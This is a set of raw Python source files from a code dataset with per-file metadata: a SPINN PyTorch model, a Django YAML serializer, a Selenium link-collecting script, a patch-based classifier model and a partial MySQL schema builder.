args.tracker_size = tracking_lstm_hidden_dim\n args.transition_weight = transition_weight\n\n self.initial_embeddings = initial_embeddings\n self.word_embedding_dim = word_embedding_dim\n self.model_dim = model_dim\n classifier_dropout_rate = 1. - classifier_keep_rate\n\n vocab = Vocab()\n vocab.size = initial_embeddings.shape[0] if initial_embeddings is not None else vocab_size\n vocab.vectors = initial_embeddings\n\n # Build parsing component.\n self.spinn = self.build_spinn(args, vocab, use_skips)\n\n # Build classiifer.\n features_dim = self.get_features_dim()\n self.mlp = MLP(features_dim, mlp_dim, num_classes,\n num_mlp_layers, mlp_bn, classifier_dropout_rate)\n\n # The input embeddings represent the hidden and cell state, so multiply by 2.\n self.embedding_dropout_rate = 1. - embedding_keep_rate\n input_embedding_dim = args.size * 2\n\n # Projection will effectively be done by the encoding network.\n use_projection = True if encode_style is None else False\n\n # Create dynamic embedding layer.\n self.embed = Embed(input_embedding_dim, vocab.size, vectors=vocab.vectors, use_projection=use_projection)\n\n # Optionally build input encoder.\n if encode_style is not None:\n self.encode = self.build_input_encoder(encode_style=encode_style,\n word_embedding_dim=word_embedding_dim, model_dim=model_dim,\n num_layers=encode_num_layers, bidirectional=encode_bidirectional, reverse=encode_reverse,\n dropout=self.embedding_dropout_rate)\n\n def get_features_dim(self):\n features_dim = self.hidden_dim * 2 if self.use_sentence_pair else self.hidden_dim\n if self.use_sentence_pair:\n if self.use_difference_feature:\n features_dim += self.hidden_dim\n if self.use_product_feature:\n features_dim += self.hidden_dim\n return features_dim\n\n def build_features(self, h):\n if self.use_sentence_pair:\n h_prem, h_hyp = h\n features = [h_prem, h_hyp]\n if self.use_difference_feature:\n features.append(h_prem - h_hyp)\n if self.use_product_feature:\n features.append(h_prem * h_hyp)\n features = torch.cat(features, 1)\n else:\n features = h[0]\n return features\n\n def build_input_encoder(self, encode_style=\"LSTM\", word_embedding_dim=None, model_dim=None,\n num_layers=None, bidirectional=None, reverse=None, dropout=None):\n if encode_style == \"LSTM\":\n encoding_net = LSTM(word_embedding_dim, model_dim,\n num_layers=num_layers, bidirectional=bidirectional, reverse=reverse,\n dropout=dropout)\n else:\n raise NotImplementedError\n return encoding_net\n\n def build_spinn(self, args, vocab, use_skips):\n return SPINN(args, vocab, use_skips=use_skips)\n\n def build_example(self, sentences, transitions):\n raise Exception('Not implemented.')\n\n def spinn_hook(self, state):\n pass\n\n def run_spinn(self, example, use_internal_parser, validate_transitions=True):\n self.spinn.reset_state()\n state, transition_acc, transition_loss = self.spinn(example,\n use_internal_parser=use_internal_parser,\n validate_transitions=validate_transitions)\n self.spinn_hook(state)\n return state, transition_acc, transition_loss\n\n def output_hook(self, output, sentences, transitions, y_batch=None):\n pass\n\n def forward(self, sentences, transitions, y_batch=None,\n use_internal_parser=False, validate_transitions=True):\n example = self.build_example(sentences, transitions)\n\n b, l = example.tokens.size()[:2]\n\n embeds = self.embed(example.tokens)\n embeds = F.dropout(embeds, self.embedding_dropout_rate, training=self.training)\n embeds = torch.chunk(to_cpu(embeds), b, 0)\n\n if hasattr(self, 'encode'):\n to_encode = torch.cat([e.unsqueeze(0) for e in embeds], 0)\n encoded = self.encode(to_encode)\n embeds = [x.squeeze() for x in torch.chunk(encoded, b, 0)]\n\n # Make Buffers\n embeds = [torch.chunk(x, l, 0) for x in embeds]\n buffers = [list(reversed(x)) for x in embeds]\n\n example.bufs = buffers\n\n h, transition_acc, transition_loss = self.run_spinn(example, use_internal_parser, validate_transitions)\n\n self.spinn_outp = h\n\n self.transition_acc = transition_acc\n self.transition_loss = transition_loss\n\n # Build features\n features = self.build_features(h)\n\n output = self.mlp(features)\n\n self.output_hook(output, sentences, transitions, y_batch)\n\n return output\n\n\nclass SentencePairModel(BaseModel):\n\n def build_example(self, sentences, transitions):\n batch_size = sentences.shape[0]\n\n # Build Tokens\n x_prem = sentences[:,:,0]\n x_hyp = sentences[:,:,1]\n x = np.concatenate([x_prem, x_hyp], axis=0)\n\n # Build Transitions\n t_prem = transitions[:,:,0]\n t_hyp = transitions[:,:,1]\n t = np.concatenate([t_prem, t_hyp], axis=0)\n\n example = Example()\n example.tokens = to_gpu(Variable(torch.from_numpy(x), volatile=not self.training))\n example.transitions = t\n\n return example\n\n def run_spinn(self, example, use_internal_parser=False, validate_transitions=True):\n state_both, transition_acc, transition_loss = super(SentencePairModel, self).run_spinn(\n example, use_internal_parser, validate_transitions)\n batch_size = len(state_both) / 2\n h_premise = get_h(torch.cat(state_both[:batch_size], 0), self.hidden_dim)\n h_hypothesis = get_h(torch.cat(state_both[batch_size:], 0), self.hidden_dim)\n return [h_premise, h_hypothesis], transition_acc, transition_loss\n\n\nclass SentenceModel(BaseModel):\n\n def build_example(self, sentences, transitions):\n batch_size = sentences.shape[0]\n\n # Build Tokens\n x = sentences\n\n # Build Transitions\n t = transitions\n\n example = Example()\n example.tokens = to_gpu(Variable(torch.from_numpy(x), volatile=not self.training))\n example.transitions = t\n\n return example\n\n def run_spinn(self, example, use_internal_parser=False, validate_transitions=True):\n state, transition_acc, transition_loss = super(SentenceModel, self).run_spinn(\n example, use_internal_parser, validate_transitions)\n h = get_h(torch.cat(state, 0), self.hidden_dim)\n return [h], transition_acc, transition_loss\n", "sub_path": "python/spinn/fat_stack.py", "file_name": "fat_stack.py", "file_ext": "py", "file_size_in_byte": 26520, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "spinn.util.blocks.BaseSentencePairTrainer", "line_number": 37, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 43, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 43, "usage_type": "name"}, {"api_name": "spinn.util.blocks.Linear", "line_number": 49, "usage_type": "call"}, {"api_name": "spinn.util.blocks.Linear", "line_number": 50, "usage_type": "call"}, {"api_name": "spinn.util.blocks.Linear", "line_number": 51, "usage_type": "call"}, {"api_name": "spinn.util.blocks.Linear", "line_number": 54, "usage_type": "call"}, {"api_name": "spinn.util.blocks.HeKaimingInitializer", "line_number": 54, "usage_type": "name"}, {"api_name": "spinn.util.blocks.Linear", "line_number": 56, "usage_type": "call"}, {"api_name": "spinn.util.blocks.HeKaimingInitializer", "line_number": 56, "usage_type": "name"}, {"api_name": "spinn.util.blocks.to_gpu", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 79, "usage_type": "attribute"}, {"api_name": "spinn.util.blocks.lstm", "line_number": 83, "usage_type": "call"}, {"api_name": "spinn.util.blocks.unbundle", "line_number": 92, "usage_type": "call"}, {"api_name": "spinn.util.blocks.bundle", "line_number": 97, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 101, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 101, "usage_type": "name"}, {"api_name": "spinn.util.blocks.Reduce", "line_number": 113, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 118, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 118, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 122, "usage_type": "attribute"}, {"api_name": "spinn.util.blocks.to_gpu", "line_number": 142, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 142, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 142, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 143, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 171, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 185, "usage_type": "call"}, {"api_name": "torch.nn.functional.log_softmax", "line_number": 194, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 194, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 204, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 206, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 222, "usage_type": "call"}, {"api_name": "spinn.util.blocks.to_gpu", "line_number": 243, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 243, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 244, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 244, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 244, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 292, "usage_type": "call"}, {"api_name": "spinn.util.blocks.bundle", "line_number": 304, "usage_type": "call"}, {"api_name": "spinn.util.blocks.bundle", "line_number": 305, "usage_type": "call"}, {"api_name": "spinn.util.blocks.bundle", "line_number": 306, "usage_type": "call"}, {"api_name": "torch.nn.functional.log_softmax", "line_number": 337, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 337, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 353, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 365, "usage_type": "call"}, {"api_name": "spinn.util.blocks.to_gpu", "line_number": 366, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 366, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 366, "usage_type": "call"}, {"api_name": "torch.index_select", "line_number": 367, "usage_type": "call"}, {"api_name": "itertools.repeat", "line_number": 405, "usage_type": "call"}, {"api_name": "torch.nn.NLLLoss", "line_number": 441, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 441, "usage_type": "name"}, {"api_name": "spinn.util.blocks.to_gpu", "line_number": 441, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 441, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 442, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 457, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 457, "usage_type": "name"}, {"api_name": "spinn.util.misc.Args", "line_number": 493, "usage_type": "call"}, {"api_name": "spinn.util.misc.Vocab", "line_number": 505, "usage_type": "call"}, {"api_name": "spinn.util.blocks.MLP", "line_number": 514, "usage_type": "call"}, {"api_name": "spinn.util.blocks.Embed", "line_number": 525, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 551, "usage_type": "call"}, {"api_name": "spinn.util.blocks.LSTM", "line_number": 559, "usage_type": "call"}, {"api_name": "torch.nn.functional.dropout", "line_number": 593, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 593, "usage_type": "name"}, {"api_name": "torch.chunk", "line_number": 594, "usage_type": "call"}, {"api_name": "spinn.util.blocks.to_cpu", "line_number": 594, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 597, "usage_type": "call"}, {"api_name": "torch.chunk", "line_number": 599, "usage_type": "call"}, {"api_name": "torch.chunk", "line_number": 602, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 632, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 637, "usage_type": "call"}, {"api_name": "spinn.util.misc.Example", "line_number": 639, "usage_type": "call"}, {"api_name": "spinn.util.blocks.to_gpu", "line_number": 640, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 640, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 640, "usage_type": "call"}, {"api_name": "spinn.util.blocks.get_h", "line_number": 649, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 649, "usage_type": "call"}, {"api_name": "spinn.util.blocks.get_h", "line_number": 650, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 650, "usage_type": "call"}, {"api_name": "spinn.util.misc.Example", "line_number": 665, "usage_type": "call"}, {"api_name": "spinn.util.blocks.to_gpu", "line_number": 666, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 666, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 666, "usage_type": "call"}, {"api_name": "spinn.util.blocks.get_h", "line_number": 674, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 674, "usage_type": "call"}]} +{"seq_id": "195497707", "text": "\"\"\" pretty serialization for yaml \"\"\"\nimport yaml\nfrom django.core.serializers.pyyaml import ( # IGNORE:W0611\n Serializer as YamlSerializer, DjangoSafeDumper,\n Deserializer) # @UnusedImport\n\n\nclass Serializer(YamlSerializer):\n \"\"\" utf8-friendly dumpdata management command \"\"\"\n def end_serialization(self):\n yaml.dump(self.objects, self.stream, allow_unicode=True,\n default_flow_style=False,\n Dumper=DjangoSafeDumper, **self.options)", "sub_path": "serializers/yaml.py", "file_name": "yaml.py", "file_ext": "py", "file_size_in_byte": 488, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.core.serializers.pyyaml.Serializer", "line_number": 8, "usage_type": "name"}, {"api_name": "yaml.dump", "line_number": 11, "usage_type": "call"}, {"api_name": "django.core.serializers.pyyaml.DjangoSafeDumper", "line_number": 13, "usage_type": "name"}]} +{"seq_id": "281170928", "text": "from selenium import webdriver\r\n\r\ndriver = webdriver.Chrome('C:\\\\Users\\\\humbl\\\\Downloads\\\\chromedriver_win32\\\\chromedriver.exe')\r\n\r\ndriver.maximize_window()\r\ndriver.get(\"https://tradus.com/\")\r\n\r\nlinks = set()\r\nelems = driver.find_elements_by_xpath(\"//a[@href]\")\r\n\r\nopen('Output1.txt', 'w').close()\r\n\r\ntext_file = open('Output1.txt', \"a\")\r\n\r\nfor elem in elems:\r\n link = str(elem.get_attribute(\"href\"))\r\n if \"https\" in link:\r\n links.add(link)\r\n\r\nno = 0\r\n\r\nfor link in links:\r\n no=no+1\r\n text_file.write(\"Link \"+str(no)+\": \" +str(link)+\"\\n\\n\")\r\n\r\ntext_file.close()\r\n\r\ndriver.quit()\r\n\r\n", "sub_path": "Tradus - Navigation/Navigation.py", "file_name": "Navigation.py", "file_ext": "py", "file_size_in_byte": 601, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "selenium.webdriver.Chrome", "line_number": 3, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 3, "usage_type": "name"}]} +{"seq_id": "243399521", "text": "import torch\nfrom .base_model import BaseModel\nfrom . import networks\nimport numpy as np\n\n\nclass Classifier128Model(BaseModel):\n @staticmethod\n def modify_commandline_options(parser, is_train=True):\n parser.set_defaults(dataset_mode='categorical', preprocess='resize', load_size=512, input_nc=3, output_nc=3, no_flip=True)\n parser.set_defaults(save_epoch_freq=10, display_id=0, niter=20, niter_decay=0, lr=0.00001)\n parser.add_argument('--n_class', type=int, default=2, help='')\n parser.add_argument('--n_aggressive', type=int, default=10, help='')\n parser.add_argument('--threshold_increase', type=float, default=0.2, help='')\n parser.add_argument('--max_threshold', type=float, default=0.8, help='')\n parser.add_argument('--class_csv', type=str, default='class.csv', help='')\n return parser\n\n def __init__(self, opt):\n BaseModel.__init__(self, opt)\n # specify the training losses you want to print out. The training/test scripts will call \n self.loss_names = ['G', 'D', 'Class']\n # specify the images you want to save/display. The training/test scripts will call \n self.visual_names = ['full_image', 'labelsG', 'labelsD', 'labelsC']\n # specify the models you want to save to the disk. The training/test scripts will call and \n self.model_names = ['G', 'D', 'Classifier']\n # define networks\n self.netG = networks.StyledGenerator128(opt.input_nc, opt.output_nc, opt.n_class, 'classify')\n self.netD = networks.StyledDiscriminator(opt.input_nc, opt.n_class, 'classify')\n self.netClassifier = networks.StyledDiscriminator(opt.input_nc, opt.n_class, 'classify')\n self.netG = networks.init_net(self.netG, opt.init_type, opt.init_gain, self.gpu_ids)\n self.netD = networks.init_net(self.netD, opt.init_type, opt.init_gain, self.gpu_ids)\n self.netClassifier = networks.init_net(self.netClassifier, opt.init_type, opt.init_gain, self.gpu_ids)\n\n self.colors = [[1, -1, -1], [1, 0, -1], [1, 1, -1], [-1, 1, -1], [-1, 1, 1], [-1, -1, 1]]\n self.colors[self.opt.n_class - 1] = [0, 0, 0]\n\n\n if self.isTrain:\n # define loss functions\n #weights = torch.FloatTensor([1 if i != opt.n_class - 1 else 1 / opt.n_class for i in range(opt.n_class)]).to(self.device)\n self.criterion = torch.nn.CrossEntropyLoss()\n self.threshold = 0\n self.softmax = torch.nn.Softmax(dim=1)\n # initialize optimizers; schedulers will be automatically created by function .\n self.optimizer_G = torch.optim.Adam(self.netG.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))\n self.optimizer_D = torch.optim.Adam(self.netD.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))\n self.optimizer_netClassifier = torch.optim.Adam(self.netClassifier.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))\n self.optimizers.append(self.optimizer_G)\n self.optimizers.append(self.optimizer_D)\n self.optimizers.append(self.optimizer_netClassifier)\n\n def set_input(self, input):\n \"\"\"Unpack input data from the dataloader and perform necessary pre-processing steps.\n\n Parameters:\n input (dict): include the data itself and its metadata information.\n\n The option 'direction' can be used to swap images in domain A and domain B.\n \"\"\"\n self.full_image = input['image'].to(self.device)\n self.given_label = input['label']\n self.indices1 = np.array([i for i in range(self.given_label.size()[0])])\n self.indices2 = self.given_label.numpy()\n self.image_paths = input['path']\n\n def forward(self):\n return\n\n def backward_D(self, allow_background=True):\n predictD = self.netD(self.image)\n softmax = self.softmax(predictD).detach().cpu().numpy()\n given_score = softmax[self.indices1, self.indices2]\n label = torch.LongTensor([self.given_label[i] if given_score[i] >= self.threshold or not allow_background else self.opt.n_class - 1 for i in range(len(self.indices1))]).to(self.device)\n for i in range(len(given_score)):\n if given_score[i] > self.max_D[i]:\n self.max_D[i] = given_score[i]\n self.loss_D = self.criterion(predictD, label)\n self.loss_D.backward()\n\n def backward_G(self, allow_background=True):\n predictG = self.netG(self.image)\n softmax = self.softmax(predictG).detach().cpu().numpy()\n given_score = softmax[self.indices1, self.indices2]\n label = torch.LongTensor([self.given_label[i] if given_score[i] >= self.threshold or not allow_background else self.opt.n_class - 1 for i in range(len(self.indices1))]).to(self.device)\n for i in range(len(given_score)):\n if given_score[i] > self.max_G[i]:\n self.max_G[i] = given_score[i]\n self.loss_G = self.criterion(predictG, label)\n self.loss_G.backward()\n\n def backward_Class(self, allow_background=True):\n predictClass = self.netClassifier(self.image)\n softmax = self.softmax(predictClass).detach().cpu().numpy()\n given_score = softmax[self.indices1, self.indices2]\n label = torch.LongTensor([self.given_label[i] if given_score[i] >= self.threshold or not allow_background else self.opt.n_class - 1 for i in range(len(self.indices1))]).to(self.device)\n for i in range(len(given_score)):\n if given_score[i] > self.max_Class[i]:\n self.max_Class[i] = given_score[i]\n self.loss_Class = self.criterion(predictClass, label)\n self.loss_Class.backward()\n\n def optimize_parameters(self, allow_background=True):\n self.max_D = [0] * len(self.indices1)\n self.max_G = [0] * len(self.indices1)\n self.max_Class = [0] * len(self.indices1)\n \n self.cumulative_loss_G = 0\n self.cumulative_loss_D = 0\n self.cumulative_loss_C = 0\n\n interval = self.opt.load_size // 4\n half_interval = interval // 2\n startX = np.random.randint(interval + 2) - half_interval\n startY = np.random.randint(interval + 2) - half_interval\n for i in range(3):\n for j in range(3):\n X = min(startX + interval * (i + 1), self.opt.load_size - interval)\n Y = min(startY + interval * (j + 1), self.opt.load_size - interval)\n self.X_pos = i\n self.Y_pos = j\n self.image = self.full_image[:, :, X:X + interval, Y:Y + interval]\n self.run_optimizers(allow_background)\n self.cumulative_loss_G += self.loss_G.detach()\n self.cumulative_loss_D += self.loss_D.detach()\n self.cumulative_loss_C += self.loss_Class.detach()\n \n for i in range(2):\n for j in range(2):\n X = min(startX + interval * (i + 1), self.opt.load_size - interval)\n Y = min(startY + interval * (j + 1), self.opt.load_size - interval)\n self.X_pos = i + 0.5\n self.Y_pos = j + 0.5\n self.image = self.full_image[:, :, X:X + interval, Y:Y + interval]\n self.run_optimizers(allow_background)\n self.cumulative_loss_G += self.loss_G.detach()\n self.cumulative_loss_D += self.loss_D.detach()\n self.cumulative_loss_C += self.loss_Class.detach()\n\n self.loss_G = self.cumulative_loss_G / 13\n self.loss_D = self.cumulative_loss_D / 13\n self.loss_Class = self.cumulative_loss_C / 13\n\n rerun = False\n for i in range(len(self.max_D)):\n rerun = rerun or self.max_D[i] < self.threshold or self.max_G[i] < self.threshold or self.max_Class[i] < self.threshold\n if rerun and allow_background:\n self.optimize_parameters(False)\n\n def run_optimizers(self, allow_background=True):\n self.optimizer_D.zero_grad()\n self.backward_D(allow_background)\n self.optimizer_D.step()\n self.optimizer_G.zero_grad()\n self.backward_G(allow_background)\n self.optimizer_G.step()\n self.optimizer_netClassifier.zero_grad()\n self.backward_Class(allow_background)\n self.optimizer_netClassifier.step()\n\n def update_epoch_params(self, epoch):\n if epoch > self.opt.n_aggressive:\n self.threshold = min(self.opt.max_threshold, self.opt.threshold_increase * (epoch - self.opt.n_aggressive))\n\n def get_color_for_label(self, labels):\n return [self.colors[label] for label in labels]\n\n def compute_visuals(self, dataset=None):\n if dataset is None:\n return\n self.labelsG = self.full_image.clone()\n self.labelsD = self.full_image.clone()\n self.labelsC = self.full_image.clone()\n\n interval = self.opt.load_size // 4\n half_interval = interval // 2\n cumulative_softmaxG = 0\n cumulative_softmaxD = 0\n cumulative_softmaxC = 0\n for i in range(4):\n for j in range(4):\n X = interval * i\n Y = interval * j\n self.image = self.full_image[:, :, X:X + interval, Y:Y + interval]\n softmaxG = self.softmax(self.netG(self.image)).detach()\n softmaxD = self.softmax(self.netD(self.image)).detach()\n softmaxC = self.softmax(self.netClassifier(self.image))\n predictG = torch.argmax(softmaxG, dim=1).cpu().numpy()\n predictD = torch.argmax(softmaxD, dim=1).cpu().numpy()\n predictC = torch.argmax(softmaxC, dim=1).cpu().numpy()\n self.labelsG[:, :, X:X + interval, Y:Y + interval] = torch.FloatTensor(self.get_color_for_label(predictG)).view(-1, 3, 1, 1).repeat(1, 1, interval, interval).to(self.device)\n self.labelsD[:, :, X:X + interval, Y:Y + interval] = torch.FloatTensor(self.get_color_for_label(predictD)).view(-1, 3, 1, 1).repeat(1, 1, interval, interval).to(self.device)\n self.labelsC[:, :, X:X + interval, Y:Y + interval] = torch.FloatTensor(self.get_color_for_label(predictC)).view(-1, 3, 1, 1).repeat(1, 1, interval, interval).to(self.device)\n cumulative_softmaxG += softmaxG.detach()\n cumulative_softmaxD += softmaxD.detach()\n cumulative_softmaxC += softmaxC.detach()\n print(cumulative_softmaxG[0, :])\n print(cumulative_softmaxD[0, :])\n print(cumulative_softmaxC[0, :])\n", "sub_path": "models/classifier128_model.py", "file_name": "classifier128_model.py", "file_ext": "py", "file_size_in_byte": 10642, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "base_model.BaseModel", "line_number": 7, "usage_type": "name"}, {"api_name": "base_model.BaseModel.__init__", "line_number": 20, "usage_type": "call"}, {"api_name": "base_model.BaseModel", "line_number": 20, "usage_type": "name"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 42, "usage_type": "attribute"}, {"api_name": "torch.nn.Softmax", "line_number": 44, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 44, "usage_type": "attribute"}, {"api_name": "torch.optim.Adam", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 46, "usage_type": "attribute"}, {"api_name": "torch.optim.Adam", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 47, "usage_type": "attribute"}, {"api_name": "torch.optim.Adam", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 48, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 114, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 115, "usage_type": "attribute"}, {"api_name": "torch.argmax", "line_number": 188, "usage_type": "call"}, {"api_name": "torch.argmax", "line_number": 189, "usage_type": "call"}, {"api_name": "torch.argmax", "line_number": 190, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 191, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 192, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 193, "usage_type": "call"}]} +{"seq_id": "572078137", "text": "#!/usr/bin/env python\n\n\nfrom solo.db.schema import DatabaseSchema\nfrom solo.db.exceptions import (\n SchemaNotExistException,\n SchemaExistsException)\n\nimport logging\n\n\nclass MySQLDatabaseSchema(DatabaseSchema):\n\n COMMENT_MAX_TABLE = 60\n COMMENT_MAX_COLUMN = 255\n\n def get_prefix_info(self, table='defalut', add_prefix=True):\n\n info = {'prefix': self.connection.table_prefix(table)}\n if add_prefix:\n table = info['prefix'] + table\n\n pos = table.find('.')\n if pos:\n info['database'] = table[:pos]\n info['table'] = table[pos:]\n else:\n db_info = Database.get_connection_info()\n info['database'] = db_info['default']['database']\n info['table'] = table\n\n return info\n\n def build_table_named_condition(self, table_name,\n operator='=', add_prefix=True):\n info = self.connection.get_connection_options()\n table_info = self.get_prefix_info(table_name, add_prefix)\n condition = QueryCondition('AND')\n condition.condition('table_schema', table_info['database'])\n condition.connection('table_name', table_info['table'], operator)\n return condition\n\n def create_table_sql(self, name, table):\n info = self.connection.get_connection_options()\n table.update({'mysql_engine': 'InnoDB', 'mysql_character_set': 'utf8'})\n sql = 'CREATE TABLE ' + name + ' (\\n'\n for field_name, field in table['fields'].iteritems():\n sql += self.create_field_sql(field_name,\n self.process_field(field))+ ', \\n'\n keys = self.create_keys_sql(table)\n if keys:\n sql += ', \\n'.join(keys) + ', \\n'\n sql = sql[:-3] + '\\n) '\n sql += ' ENGINE = ' + table['mysql_engine'] + \\\n ' DEFAULT CHARACTER SET ' + table['mysql_character_set']\n\n if table.get('description'):\n sql += ' COMMENT ' + \\\n self.prepare_comment(\n table['description'], self.COMMENT_MAX_TABLE)\n return [sql]\n\n def create_field_sql(self, name, spec):\n sql = '`' + name + '` ' + spec['mysql_type']\n if spec['mysql_type'] in ['VARCHAR', 'CHAR', 'TINYTEXT',\n 'MEDIUMTEXT', 'LONGTEXT', 'TEXT'] and spec.get('length'):\n sql += '(' + str(spec['length']) + ')'\n elif spec.get('precision') and spec.get('scale'):\n sql += '(' + spec['precision'] + ', ' + spec['scale'] + ')'\n\n if spec.get('unsigned'):\n sql += ' unsigned'\n\n if spec.has_key('not null'):\n if spec.get('not null') == 'not null':\n sql += \" NOT NULL\"\n # else:\n # sql += ' NULL'\n\n if spec.get('auto_increment'):\n sql += ' auto_increment'\n\n if spec.has_key('defalut'):\n if type(spec['defalut']) is str:\n if spec['defalut'] != '':\n spec['defalut'] = \"'\" + spec['defalut'] + \"'\"\n else:\n spec['default'] = \"''\"\n elif not spec['defalut']:\n sepc['defalut'] = 'NULL'\n sql += \" DEFAULT %r\" %(spec['defalut'])\n if not (spec.has_key('not null') and spec.has_key('defalut')):\n sql += ' DEFAULT NULL'\n\n if spec.get('description'):\n sql += \" COMMENT \" + \\\n self.prepare_comment(\n spec['description'], self.COMMENT_MAX_COLUMN)\n logging.debug('field sql : %s' %(sql))\n return sql\n\n def process_field(self, field):\n if not field.get('size'):\n field['size'] = 'normal'\n if field.get('mysql_type'):\n field['mysql_type'] = field['mysql_type'].upper()\n else:\n _map = self.get_field_type_map()\n field['mysql_type'] = _map[field['type'] + ':' + field['size']]\n if field.get('type') == 'serial':\n field['auto_increment'] = True\n\n return field\n\n def get_field_type_map(self):\n return {\n 'varchar:normal': 'VARCHAR',\n 'char:normal': 'CHAR',\n\n 'text:tiny': 'TINYTEXT',\n 'text:small': 'TINYTEXT',\n 'text:medium': 'MEDIUMTEXT',\n 'text:big': 'LONGTEXT',\n 'text:normal': 'TEXT',\n\n 'serial:tiny': 'TINYINT',\n 'serial:small': 'SMALLINT',\n 'serial:medium': 'MEDIUMINT',\n 'serial:big': 'BIGINT',\n 'serial:normal': 'INT',\n\n 'int:tiny': 'TINYINT',\n 'int:small': 'SMALLINT',\n 'int:medium': 'MEDIUMINT',\n 'int:big': 'BIGINT',\n 'int:normal': 'INT',\n\n 'float:tiny': 'FLOAT',\n 'float:small': 'FLOAT',\n 'float:medium': 'FLOAT',\n 'float:big': 'DOUBLE',\n 'float:normal': 'FLOAT',\n\n 'numeric:normal': 'DECIMAL',\n\n 'blob:big': 'LONGBLOB',\n 'blob:normal': 'BLOB',\n }\n\n def create_keys_sql(self, spec):\n keys = []\n if spec.get('primary key'):\n keys.append(\n 'PRIMARY KEY (' + self.create_keys_sql_helper(spec['primary key']) + ')')\n\n if spec.get('unique keys'):\n for k, fields in spec.get('unique keys').iteritems():\n keys.append('UNIQUE KEY `' + k +\n '` (' + self.create_keys_sql_helper(fields) + ')')\n\n if spec.get('indexes'):\n for index, fields in spec.get('indexes').iteritems():\n keys.append('INDEX `' + index +\n '` (' + self.create_keys_sql_helper(fields) + ')')\n return keys\n\n def create_key_sql(self, fields):\n result = []\n for field in fields:\n if type(field) is list:\n result.append('`' + field[0] + '`(' + field[1] + ')')\n else:\n result.append('`' + field + '`')\n return ', '.join(result)\n\n create_keys_sql_helper = create_key_sql\n\n def rename_table(self, table, new_name):\n 